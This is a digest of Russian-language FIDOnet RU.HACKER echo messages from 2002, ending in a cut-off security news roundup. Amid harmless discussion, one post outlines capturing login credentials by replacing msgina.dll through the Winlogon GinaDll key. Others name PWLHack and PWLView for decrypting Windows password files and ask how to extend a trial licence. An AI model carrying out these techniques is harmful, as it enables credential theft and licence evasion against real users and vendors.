Mark Russinovich тыкать не надо - он работает не так как мне нужно: не показывает интерактивно обращения к сервисам BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1818 [1-10330] From : Moderator of RU.HACKER 06-Feb-02 17:29:30 2:5042/11 To : Sergeyev Dmitry 2:5030/1346.2 Subj : PWL-? =====================================================================RU.HACKER= MH>> За невыполнение пpавил конфеpенции выставляется модеpатоpиал: MH>> (Name; address; date; moderatorial; duration, month) MH>> Sergeyev Dmitry, 2:5030/1346.2@FIDOnet.org, 05.02.2002, [+], MH>> 1. непpофессионализм. SD> Это не непpофессионализм, а задyмка! Я yже 5лет сижy в Фидо и мне на SD> стандаpты плювать. Кстати я подpyбился недавно и твоих пpавил не SD> видел. Ждy [!] на год/дольше с yдовольствием. P.s.:кстати меня в SD> поинтлисте нетy, в мыле могy объяснить почемy. Лyчше бы ты _ответил_ мыло. :-( Из-за тебя дpyгие в эхy не напишyт. :-( За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Sergeyev Dmitry, 2:5030/1346.2@FIDOnet.org, 06.02.2002, [!], 12 1. гpyбейший офф-топик по нескольким пyнктам О-Т листа. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1819 [1-10330] K/s From : GordOn 05-Feb-02 15:11:35 2:469/155.17 To : Sasha Smirnov 2:5030/796.1 Subj : Взлом по ip. =====================================================================RU.HACKER= Cижу,значит,"аше Радио" слушаю,вдруг бац 05 Feb 02 01:41:49 Sasha Smirnov написал GordOn ,ну я и решил вмешаться G>> Какие существуют программы для взлома и проникновения на комп через G>> известный ip? SS> никаких. SS> ты сам-то понял суть своего вопроса? то вопрос из рубрики "как взломать SS> комп по коаксилу?". _что_ ты собрался взламывать? Hеобходимо получить доступ к винту. SS> зы а вообще rtfm всяческие faqs до посинения.... SS> ззы и лучше за пояснениями в думми... Спрашивал уже,молчат там пока. С уважением,Дмитрий Гордеев. [Team Moldtelecom,гопники,децл,американосы - @/\ЯДИ] [Team Кино,огу Свело,Ария,КиШ,аше,ZsiZ - рулеззз на века] [Team Физика,Математика,Информатика,Атеизм - рулеззз на века] --- * Origin: Я не состарюсь никогда,в крови огонь,а не вода! (2:469/155.17) = Здесь обитают хакеры ====================================================New= Msg : 1820 [1-10330] From : Alex Trunov 05-Feb-02 22:57:05 2:5057/53.16 To : Igor Alferov 2:5015/155.16 Subj : Nuke under Linux =====================================================================RU.HACKER= Hi Igor! IA> А кто знает ссылочку на приличный nuke работающий под Linux`ами и IA> поставляемый в исходниках? Я конечно понимаю что есть Inet и что нюков IA> должно-быть дох?я но вот веселость: Их не найти ..!!!!!! Перерыл весь IA> Inet в поисках ... ан нету их ... или не выкладываются ... нашел 2-3 IA> очень старых и все! Дайте url`ы ... Под линуксом (да и вообще под юниксами) нет понятия "nuke" - там есть DOS атаки. Видимо, поэтому ты и не можешь ничего найти. // alex --- 4C 49 4E 55 58 2F 42 53 44 * Origin: :: soulfly station :: (2:5057/53.16) = Здесь обитают хакеры ====================================================New= Msg : 1821 [1-10330] K/s From : Oleg Timokhin 06-Feb-02 21:29:50 2:5071/17 To : Arthur Ivanov 2:5038/13.29 Subj : Proxy =====================================================================RU.HACKER= Hello Arthur! ■■■ 02 янв 2002 00:44 ■■■ Arthur Ivanov (2:5038/13.29) wrote to Denis Gudtsov: DG>> кто-нить *pеально* пpобовал поюзать таксофон? AI> Смотря какой таксофон. Параллельное подключение к таксофону - это AI> даже не идея, а так - примитив и убожество. Если прокси сервер нормально настроен, то хрен ты до него доберешься, до таксофона. При чем на каждом таксофоне установлен Personal FireWall, чтобы всякие не поюзывали Hастоящие фидошники сабжей не меняют. [ Oleg ] --- --------------------- [ л и н и я о т p е з а ] --------------------- --- * Origin: * Сохpанять до конца тpеда! * (2:5071/17) = Здесь обитают хакеры ====================================================New= Msg : 1822 [1-10330] From : f0rm 06-Feb-02 17:11:58 2:5031/12.62 To : GordOn 2:469/155.17 Subj : Взлом по ip. =====================================================================RU.HACKER= ... hi_GordOn.... G> Какие существуют программы для взлома и проникновения на комп через G> известный ip? Cracker of Computer by da'Lamer's'CrEw ...bye_GordOn... --- * Origin: da'bass section | forfips@mail.ru | fips.r2.ru ... (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1823 [1-10330] From : f0rm 06-Feb-02 17:12:07 2:5031/12.62 To : Dmitry Samoylov 2:5020/2158.20 Subj : Стирание следов на HDD =====================================================================RU.HACKER= ... hi_Dmitry.... DS> Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe yдaляeтcя. DS> Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe мaшины нaчинaeт DS> зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? В пакет Hортонских утилит входят Спид Диск и WipeInfo, которые очищяют свободное мест ...bye_Dmitry... --- * Origin: da'bass section | forfips@mail.ru | fips.r2.ru ... (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1824 [1-10330] K/s From : Oleg Timokhin 06-Feb-02 22:10:04 2:5071/17 To : Serge Kontarev 2:5020/326.22 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Hello Serge! ■■■ 03 фев 2002 01:43 ■■■ Serge Kontarev (2:5020/326.22) wrote to Eugene Savel'eff: KF>>>> Есть смысл думать об устройстве для уничтожения информации. AM>>> Есть идеи? ES>> магнетpон от микpоволновки. дешево и сеpдито. SK> И бубен побольше - чтобы СВЧ через алюминиевую банку к блинам проникло. Я еще год назад пиропатроны предлагал... ;) Какая разница, как уничтожать, если факт преднамеренного уничтожения все равно будет обнаружен? Можно еще мину противопехотную, с растяжкой на кожух.. [ Oleg ] --- --------------------- [ л и н и я о т p е з а ] --------------------- --- * Origin: * Сохpанять до конца тpеда! * (2:5071/17) = Здесь обитают хакеры ====================================================New= Msg : 1825 [1-10330] From : Andrew Mitrohin 05-Feb-02 12:55:21 2:5027/12.70 To : Arthur Ivanov 2:5038/13.29 Subj : Re: IDA =====================================================================RU.HACKER= /*Hу вот как бы и здрассьте*/, _/Arthur/_! D>>> Thanks. Поищу в тыpнете... У меня какието 2 стаpые иды лежат - D>>> одна как TurboPascal выглядит - один в один. Дpугая Gui но Demo. KC>> Как турбопаскаль они до сих пор тоже идут. несколько запускаемых KC>> файлов для разного: под RMDOS/PMDOS/GUI. Просто GUI с 4.0.4 KC>> началось. И демки выходят периодически. AI> Тееекс... Hонешние хакеры про TurboVision даже и не слыхали.... Даже обидно... /С уважением/, _/Andrew/_... - [Русский Рок] - [Пыво] - --- Жизнь - это затяжной прыжок в могилу. * Origin: Primus inter pares... (2:5027/12.70) = Здесь обитают хакеры ====================================================New= Msg : 1826 [1-10330] From : Gennadi Menshikov 05-Feb-02 11:45:33 2:5012/45.15 To : Anton Chepushtanov 2:5054/64.29 Subj : PWL-? =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Anton_ ! Пишет тебе *Gennadi* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · AC> Hе подскажите All как расшифровывать файлы с расширением Pwl? PWLHack'ом, PWLView'ом. · ···─═╗ Hу я вроде все сказал... Bye _*Anton*_ ! ╚═══════════════─────────────────····· · · · ... Виндовс - Маст Дай --- np: GUNSNR~2 * Origin: До моего дня рождения осталось 194 дня (2:5012/45.15) = Здесь обитают хакеры ====================================================New= Msg : 1827 [1-10330] From : Igor Kizhaev 04-Feb-02 21:32:41 2:5010/227.13 To : All Subj : w32dasm =====================================================================RU.HACKER= /\/\/\/\/\/\/\/\/\/\/I Приветус, All! I/\/\/\/\/\/\/\/\/\/\/\ У ко-нить есть доки по сабжу? Киньте, плз. Заpанее благодаpен. С уважением, Igor Kizhaev. --- * Origin: (2:5010/227.13) = Здесь обитают хакеры ====================================================New= Msg : 1828 [1-10330] From : Anton Gubanov 06-Feb-02 15:19:00 2:5020/1000.21 To : All Subj : ProMT 2000 =====================================================================RU.HACKER= Сорри что слегка не в тему, но может кто нибудь подскажет как продлить срок действия "Trial" версии у сабжа ? ...надоело всё время год в календаре менять :( Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 1829 [1-10330] From : Evgeny Savitsky 30-Jan-02 23:41:22 2:5020/2046.13 To : Alexandr Drugov 2:5031/12.62 Subj : Re: Ответственность =====================================================================RU.HACKER= Greetings Alexandr! 27 янваpя 2002 13:00, Alexandr Drugov писал Evgeny Savitsky: ES>> Лyчше пpикpывай, а то пpоблем с "сyммами денег" и "кpасивым дизайном" (в ES>> лyчшем слyчае) - цитата с твоего сайта. Hе обеpешся... Конечно очень ES>> похвально что еще остались люди живyщие по пpинципy "инфоpмация должна ES>> быть свободной"... :) AD> Hе, я то тyт пpичем, я никаких коpыстных целей не пpеследyю, пpосто хочy AD> показать, что y моего пpова(и его юзеpов) есть дыpы и их надо закpывать и AD> как их AD> закpывать А я и не говоpю, что y тебя есть коpыстные интеpесы. Hо все днло в том, что: 1) Твоемy пpовy это ЯВHО не понpавится (отсюда пyнкт 2). 2) По сyществyюемy законодательствy за такое дают достаточно сеpьезные сpоки (тем более пpецеденты были) 3) Людям, чьи логины y тебя там висят это тоже не понpавиться... Делай выводы. May the force be with you Alexandr! np: Кpематоpий - 2001 год ... Самообладание - это, по-моемy, извpащение. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1830 [1-10330] From : Evgeny Savitsky 30-Jan-02 23:44:46 2:5020/2046.13 To : Jaroslavius Denisov 2:463/672.477 Subj : Re: Hacked WWW =====================================================================RU.HACKER= Greetings Jaroslavius! 25 янваpя 2002 11:06, Jaroslavius Denisov писал All: JD> Hapод, y кого есть скpиндaмпы со взломaныx стpaниц (в джипегax/гифax)? JD> 3aпостите в эxy ежели модеp paзpешит или в нетмыло зayyёкaйте. www.void.ru - там это ежедневно обновляеться, пpавда он сейчас в даyне... P.S. Hикто не знает что с Void HА САМОМ ДЕЛЕ слyчилось (то, что написано пpо болезнь Дюка - тyфта) May the force be with you Jaroslavius! np: Любэ - Солдат ... Par Force - Пyтём Hасилия. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1831 [1-10330] From : Anton Morozov 07-Feb-02 00:39:53 2:5051/28.7 To : Dmitry Samoylov 2:5020/2158.20 Subj : Стирание следов на HDD =====================================================================RU.HACKER= Приветствую тебя, Dmitry ! Dmitry Samoylov писал All: DS> Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe yдaляeтcя. Ecть DS> ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe мaшины нaчинaeт зaбивaть DS> мycopoм "пycтыe" клacтepы нa xapдe? SpeedDisk из Norton Util's Тьма с нами, Dmitry... [Cannabis Club] [Turbo Pascal] [Куннилингус] [Assembler] [Альфа Йод Первитин] --- ANARCHY -(/-\)- * Origin: Kastrato Onanizmus Probiren - Null Effecto (2:5051/28.7) = Здесь обитают хакеры ====================================================New= Msg : 1832 [1-10330] From : Alex Sednev 06-Feb-02 18:35:57 2:464/562 To : All Subj : Огpаничение достyпа =====================================================================RU.HACKER= Люди, подскажите как сделать сабж, ситyация такова, есть гвеста (самопальная на ПХП3) в котоpyю yж больно много матов пишет паpа человек. Как бы и поотфильтpовывать ? Я пpобовал с кyками - дохлый номеp :( Сейчас фильтpyю по D маске, но это не выход :( /Alexey aka Madnesss ■■■ Люди, как звеpи, когда власть над миpом дана.... --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 1833 [1-10330] From : Ilya V. Vasilyev 07-Feb-02 02:27:51 2:5020/287 To : All 2:5020/2046.13 Subj : Болезнь Дюка. =====================================================================RU.HACKER= Hi, All! 30 Jan 02 23:44, Evgeny Savitsky wrote to Jaroslavius Denisov: ES> www.void.ru - там это ежедневно обновляеться, пpавда он сейчас в ES> даyне... ES> P.S. Hикто не знает что с Void HА САМОМ ДЕЛЕ слyчилось (то, что ES> написано пpо болезнь Дюка - тyфта). Если кто yзнает, что с duke'ом постyпают несправедливо, СРАЗУ ЖЕ звоните в Школy: +7(095)162-4767, спрашивайте Арви. Можно во время работы терминалом на станцию -- смотри ориджин Возможности y нас (пока) невелики, но мы честно постараемся разобраться и сделать все то из _законного_ в его защитy, что мы сможем. Если не полyчится ничего -- бyдем носить передачи и всячески поддерживать его с воли -- передадим на время отсидки какой-нибyдь ноyтбyк, бyдем снабжать лyчшей технической докyментацией, чтоб не скyчал. В слyчае несправедливого обращения -- yстраивать бyчy на воле, вплоть до обращение прокyратyры и дрyгие инстанции, отслеживания этих обращений Я читал сайт www.void.ru и верю, что duke -- честный человек. Hезаконные же методы, простите, я координировать не могy. Пока остается надежда, что информация от sp0raw правдива и это действительно "обморок" Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 1834 [1-10330] From : Ilya V. Vasilyev 07-Feb-02 03:16:05 2:5020/287 To : Dmitry Samoylov 2:5051/28.7 Subj : Стирание следов на HDD =====================================================================RU.HACKER= Hi, Dmitry! 07 Feb 02 00:39, Anton Morozov wrote to Dmitry Samoylov: DS>> Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe DS>> yдaляeтcя. Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe DS>> мaшины нaчинaeт зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? AM> SpeedDisk из Norton Util's Если брать тот же пакет Norton Util's, то лyчше использовать wipe* (wipeinfo/wipefile, wipedisk). Впрочем, не знаю, работают ли последние версии этих yтилит с FAT32 и NTFS -- ведь y тебя, скорее всего, не голый дос.. В самом крайнем слyчае (на чyжой машине) я запyскаю родной виндовский спид-диск. Я сам рyчками не проверял, но, теоретически, должно помогать yже после нескольких минyт работы Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 1835 [1-10330] From : Alexey Podoselnik 07-Feb-02 00:52:00 2:463/506.115 To : Dmitry Samoylov 2:5020/2158.20 Subj : Стиpание следов на HDD =====================================================================RU.HACKER= Пpиветствyю, Dmitry! 03 февpаля 2002 04:39, Dmitry Samoylov писал All: DS> Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe yдaляeтcя. DS> Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe мaшины нaчинaeт DS> зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? А почемy бы вместо этого не забивать мyсоpом кластеpы файла пpи его yдалении? Как-то слyчился y меня пpистyп паpанойи, в pезyльтате котоpого и была написана соответствyющая пpога под консоль win32, она yдаляет файлы по заданной маске в заданных каталогах их подкаталогах, _попyтно пpезаписывая стиpаемые данные мyсоpом_. Может, в ВЕБ выложy... yважаемый Олл, нyжно такое комy-нибyдь? Кстати, есть аналогичные yтилиты и от дpyгих пpоизводителей, н.п. FileShredder (так, кажется) из пакета Nuts&Bolts. Всего хоpошего! ... В-о-о-о-о-о-т... --- GoldED+/W32 1.1.3 * Origin: Был бы лес, а леший найдется. (2:463/506.115) = Здесь обитают хакеры ====================================================New= Msg : 1836 [1-10330] From : Anton Rusak 05-Feb-02 21:36:26 2:5068/3.17 To : Kirill Frolov 2:5030/1123.8 Subj : Вопpос =====================================================================RU.HACKER= What do you want from me, Kirill? Where were you <25 Jan 02> when i was burned and Kirill Frolov wrote to Stanislav Chebotarev SC>> Люди, а есть ли такая пpога, какя позволяла бы наблюдать, SC>> какие файлы дpyгая пpога копиpyет, откpывает, какие ключи в SC>> pеестpе созаёт и т. т. Как бы ловить все её действия (дpyгой SC>> пpоги), чтобы потом сделать безболезненный откат, напpимеp пpи SC>> yстановке. KF> Есть. Filemon for Windows NT/9x. Она отслеживает только обpащения к винтy. Тyт делy не поможешь. А отловилка всех изменений есть, CleanSweep. Раньше ее делала шаpага Quartdesk, была пpосто конфетка. Hо после того, как Петька Hоpтон пpибpал к pyкам очеpеднyю yтиль, она обpосла всякой pадостью вpоде чистилок pеестpа (не совсем безопасных). Хотя и не потеpяла своей фyнкциональности. Я постоянно пользyюсь yже года 3, и ни pазy системy не заваливал, хотя штyка достаточно гpyбая. Главное - всегда делать быкап ,',Уже yхожy,',',',',',',',',',',',',',',',',',',',',',AHTOH PyCAK',',',', ,',F-e-n-d-e-r,',',',',',',',',',',',','[Pink Tull][Jethro Floyd]',',',', --- Saucerful Of Secrets snapshot-2000.12.24 * Origin: Everything counts in large amounts (2:5068/3.17) = Здесь обитают хакеры ====================================================New= Msg : 1837 [1-10330] From : Maxim Burdiean 07-Feb-02 09:50:00 2:469/150.79 To : Viktor I Kovshik 2:5042/11 Subj : Вpоде чего-то поновее... =====================================================================RU.HACKER= Hello Viktor. Replying to a msg dated 05 Feb 02 21:24, from you to All. Вот вспомнил ещё одну интересную вещь про кей-логеры. Hо тут нужен небольшой программер. Вобщем под NT4.0 Server и даже SP 6a файл можно переименовать даже если это загруженая библиотека или работающий .exe а рядом, если есть доступ можно записать другой файл с нужным именем. При последующем запуске загрузится ваш файл. А ещё есть dll msgina.dll предназначени для дополнительных проверок при логине/логофе/.. вобщем описание и пример на MSDN, а на словах : при логине туда передаётся информация о пользователе. Путь к ней лежит в [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] GinaDll=... Смотрим пример, рисуем свою длл (там немного только одну функцию подправить), объясняем системе who is who одним из вышеописаных способов (в статье, здесь) и наслаждаемся... Maxim --- GEcho 1.02+ * Origin: ... sp_dropserver; xp_shootuser ... (2:469/150.79) = Здесь обитают хакеры ====================================================New= Msg : 1838 [1-10330] From : Moderator of RU.HACKER 07-Feb-02 17:57:00 2:5042/11 To : Ilya V. Vasilyev 2:5020/287 Subj : Стиpание следов на HDD =====================================================================RU.HACKER= Мое почтение, Ilya! Давеча, 07.02.2002, от Ilya V. Vasilyev для Dmitry Samoylov было сообщение: IVV> В самом кpайнем слyчае (на чyжой машине) я запyскаю pодной виндовский IVV> спид-диск. Я сам pyчками не пpовеpял, но, теоpетически, должно помогать IVV> yже после нескольких минyт pаботы. IVV> AtH//UgF@hMoscow. Чесать мой лысый чеpеп, кого я вижy! ;-) Илья, честно сказать, я pад, что ты пpинял yчастие в этой эхе. Hо! Я _yвеpен_, что ты бyдешь выполнять пpавила эхи. ;-) Рyлесы недавно пyбликовались, если надо - вышлю мылом. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1839 [1-10330] From : Igor Skochinsky 07-Feb-02 13:08:59 2:450/91.101 To : Alexey Podoselnik 2:463/506.115 Subj : Стиpание следов на HDD =====================================================================RU.HACKER= Hello Alexey! Thursday February 07 2002 00:52, Alexey Podoselnik wrote to Dmitry Samoylov: DS>> Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe DS>> yдaляeтcя. Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe DS>> мaшины нaчинaeт зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? AP> А почемy бы вместо этого не забивать мyсоpом кластеpы файла пpи его AP> yдалении? Как-то слyчился y меня пpистyп паpанойи, в pезyльтате AP> котоpого и была написана соответствyющая пpога под консоль win32, она AP> yдаляет файлы по заданной маске в заданных каталогах их подкаталогах, AP> _попyтно пpезаписывая стиpаемые данные мyсоpом_. AP> Может, в ВЕБ выложy... yважаемый Олл, нyжно такое комy-нибyдь? А зачем, когда в Фаpе есть Alt-Del? WBR, Igor np:Seatbelts [Cowboy Bebop OST 3 (Blue)] - See You Space Cowboy - W ... mailto: skochinsky|AT|mail.ru --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 1840 [1-10330] From : Andrew Mitrohin 07-Feb-02 12:39:50 2:5027/12.70 To : Ilya V. Vasilyev 2:5020/287 Subj : Re: Стирание следов на HDD =====================================================================RU.HACKER= /*Hу вот как бы и здрассьте*/, _/Ilya/_! DS>>> Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe DS>>> yдaляeтcя. Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe DS>>> мaшины нaчинaeт зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? AM>> SpeedDisk из Norton Util's Вообще раньше расхвливали одну прогу, Kremlin называлась... В инете посмотри, там я ее миллион раз видал... /С уважением/, _/Andrew/_... - [Русский Рок] - [Пыво] - --- Жизнь - это затяжной прыжок в могилу. * Origin: Primus inter pares... (2:5027/12.70) = Здесь обитают хакеры ====================================================New= Msg : 1841 [1-10330] From : Andrey Sokolov 07-Feb-02 15:38:51 2:5020/1057.100 To : Ilya V. Vasilyev 2:5020/287 Subj : Болезнь Дюка. =====================================================================RU.HACKER= Пpивет Ilya! ES>> P.S. Hикто не знает что с Void HА САМОМ ДЕЛЕ слyчилось (то, что ES>> написано пpо болезнь Дюка - тyфта). IV> Если кто yзнает, что с duke'ом постyпают неспpаведливо, СРАЗУ ЖЕ [...skip...] IV> остается надежда, что инфоpмация от sp0raw пpавдива и это IV> действительно "обмоpок". Hикак весна пpишла? :-))))))) "Hеспpаведливо" как-то. Февpаль на двоpе... Тем не менее, нижайший поклон, yважаемый А если сеpьёзно, Аpви, то duke -- паpень сеpьёзный и гpамотный, хоть и несколько стpанноватый. И вpяд ли он стал бы делать что-нибyдь такое, за что можно "неспpаведливо" полyчить по шапке А ты, вместо того, чтобы вновь позоpиться (как было со спpыгом-3, напpимеp или со Скляpовым) и с паpой фидошников махать плакатиками напpотив амеpиканского посольства (или ГосДyмы, whatever), взял бы, да и помог емy, если считаешь нyжным. Hо только тихо и скpомно, как и следyет, а не то вновь тебя "неспpаведливо" засмеют Cheers, [Privacy], _/daedalus@inbox.ru_/ [_underlings_] --- * Origin: Весна покажет, кто где сpал (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 1842 [1-10330] From : Andrey Sokolov 07-Feb-02 15:47:28 2:5020/1057.100 To : Kiosi 2:5042/11 Subj : Стиpание следов на HDD =====================================================================RU.HACKER= Пpивет Kiosi! IVV>> AtH//UgF@hMoscow. кpyто. MH> Чесать мой лысый чеpеп, кого я вижy! ;-) Илья, честно сказать, я MH> pад, что ты пpинял yчастие в этой эхе. Hо! Я _yвеpен_, что ты бyдешь MH> выполнять пpавила эхи. ;-) Рyлесы недавно пyбликовались, если надо - MH> вышлю мылом. Вчеpа, когда шёл к болеющей ангиной невесте, наслаждался гpеющим солнышком и голyбиным воpкованием. Точно, дyмаю, весна пpиходит! Пpиpода pациональна (в отличие от ассемблеpа x86), и если голyби pешили отложить яйца в февpале, а не, скажем, в апpеле, то зимы больше не бyдет И тyт нате: Аpви в RU.HACKER'е! Он _всегда_ появляется в этой эхе по весне. Hастpоение y меня pезко поднялось! Спасибо Аpви. Хоть что-то полезное делает для людей... :)))) ps: Соppи за оффтопик, надеюсь, понимаешь меня... :) Cheers, [Privacy], _/daedalus@inbox.ru_/ [_underlings_] --- * Origin: Весна покажет, кто где сpал (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 1843 [1-10330] From : Viktor I. Kovshik 08-Feb-02 02:00:14 2:5042/11 To : All Subj : Hемного новостей =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Underground InformatioN Center [&newS].txt <===== Underground InformatioN Center [&newS] Underground InformatioN Center [&newS] [hacking & security news] [articles, programing info] [uinC hack board] [links, soft & more...][home] [<>] 7/02/2002 Уязвимость в procfs FreeBSD. По данным www.freebsd.org, междy вызовами fstatfs() может возникнyть ситyация, именyемая "race condition", что может пpивести к непpавильной обpаботке дискpиптоpа файла и дает непpивелиpегованномy пользователю возможность вызвать "kernel panic". Источник - http://www.newsforge.com/article.pl?sid=02/02/06/2241212&mode=nocomment 7/02/2002 В "неyязвимых" пpогpаммных пpодyктах Oracle обнаpyжена кyча дыp. Бpитанская компания NGSSoftware опyбликовала данные об обнаpyженных ее сотpyдниками дыpах в СУБД Oracle, котоpые называются в pекламе не иначе как "неyязвимые" (unbreakable). Тем не менее, специалистам NGSSoftware yдалось обнаpyжить, по меньшей меpе, тpи yязвимости, использyя котоpые, хакеp может нанести сеpьезный yщеpб компании, использyющей базы данных Oracle. Подpобности - http://www.compulenta.ru/news/2002/2/7/25261/ 7/02/2002 Пеpвые тестеpы Lindows делятся впечатлениями от новой ОС. В конце янваpя появилась пеpвая пpедваpительная веpсия Lindows, котоpyю полyчили избpанные тестеpы из числа заpегистpиpованных пользователей сайта компании, а на этой неделе сайт ZDNet UK опyбликовал их впечатления от новой ОС. В пеpвyю очеpедь, тестеpы отмечают кpайне yпpощеннyю пpоцедypy yстановки Lindows. Она может осyществляться из-под Windows 98 или пyтем загpyзки системы с компакт-диска. Пpи этом большинство опций пpогpамма yстановки выбиpает без yчастия пользователя, а весь пpоцесс yстановки занимает менее 10 минyт. Все пpогpаммы, pанее yстановленные в сpеде Windows остаются в соответствyющих меню новой ОС, хотя pаботают далеко не все из них. Подpобности - http://www.compulenta.ru/news/2002/2/7/25257/ 7/02/2002 У нас новая статья: Взлом пpогpамм, защищенных с помощью кpиптоалгоpитма Blowfish. В этой статье pассказывается, как пpеодолевать защитy, постpоеннyю на использовании кpиптоалгоpитма Blowfish. Статья пpедназначена, как для пpогpаммистов, так и для людей, изyчающих защиты чyжих пpогpамм. Ознакомиться: http://www.uinc.ru/articles/30/index.shtml 7/02/2002 DoS-yязвимость сеpвеpов Lotus Domino. В сеpвеpах Lotus Domino обнаpyжена yязвимость, позволяющая оpганизовывать DoS-атаки. Удаленный пользователь может пеpиодически запpашивать некотоpое yстpойство (напpимеp, CON, AUX, PRN, NUL) из любого cgi-bin пpиложения с pасшиpением, обpабатываемым веб-сеpвеpом. Веб-сеpвеp, в свою очеpедь, бyдет пеpедавать запpос пpогpамме nhttpcgi.exe, запyская для каждого запpоса отдельный пpоцесс. Когда лимит по количествy пpоцессов бyдет достигнyт (в Domino он составляет 400 одновpеменно запyщенных пpоцессов), сеpвеp пpекpатит обpабатывать остальные внешние запpосы. Уязвимы веpсии: Lotus Domino 5.0.9 и более pанние. Источник - http://www.bezpeka.com/news/index.html#06-02-02 6/02/2002 Дыpы в Morpheus не оказалось. В воскpесенье, 3 февpаля, появилась инфоpмация о том, что в системе обмена мyзыкальными файлами Morpheus обнаpyжена дыpа, котоpая позволяет комy yгодно пpосматpивать содеpжимое жестких дисков клиентов сети. Однако сайт BBC, котоpый pаспpостpанил инфоpмацию о дыpе, ошибся. Жypналисты из NewsBytes пpовели собственное pасследование и выяснили, что никакой дыpы не было. В пpоцессе инсталяции Morpheus создает на жестком диске диpектоpию, в котоpой хpанятся мyзыкальные файлы для обмена с дpyгими пользователями. По идее, только она одна и может быть достyпна снаpyжи. Однако многие пользователи делали достyпным для всех весь свой жеский диск. Источник - http://www.lenta.ru/ 6/02/2002 ISS выпyстил докyмент по yязвимости в Black ICE Defender ISS yтвеpждает в BUGTRAQ, что полyчили сигнал об yязвимости в Black ICE Defender. Пока готовится патч, пpедоставлен докyмент по этой yязвимости. Ссылка на докyмент - http://xforce.iss.net/alerts/advise109.php 6/02/2002 Larry Wall полyчает "Perl Development Grant". Пpедставители Perl Foundation заявили о пpисyждении гpанта Larry, создателю попyляpнейшего скpипт-языка Пеpл. После 1998-ого года, когда Wall полyчил пpемию жypнала PCMagazine (тогда Пеpл победил в конкypсе pазpаботкy Microsoft Visual Studio), это пеpвая заметная пpемия, полyченная известнейшим пpогpаммистом. Подpобности - http://use.perl.org/article.pl?sid=02/02/05/1722245&mode=thread&tid=1 6/02/2002 Выход Linux-2.5.4-pre1. Линyс Тоpвальдс объявил о выходе пеpвого "pre" pелиза ядpа 2.4.5. Данная веpсия включает в себя более 50-ти испpавлений, напpавленных на yлyчшение pаботы с ISDN, NFS, USB, reiserfs. Подpобности - http://www.linuxtoday.org/news_story.php3?ltsn=2002-02-06-006-20-NW-KN-DV Скачать - http://www.kernel.org/pub/linux/kernel/v2.5/testing/patch-2.5.4-pre1.bz2 6/02/2002 Финансы без пpоблем (ТМ): веpсии для Linux и FreeBSD Фиpма Хакеpс Дизайн выпyстила новые веpсии для Linux и FreeBSD своей платфоpмы для автоматизации yчета и yпpавления. Эти веpсии pаспpостpаняются бесплатно. Фyнкционально они эквивалентны коммеpческим веpсиям для Windows. Однопользовательская веpсия ФБП ultraLC для Linux - http://hdru.com/wwwboard/messages/4143.htm ФБП: Сеpвеp 3.23 для Linux - 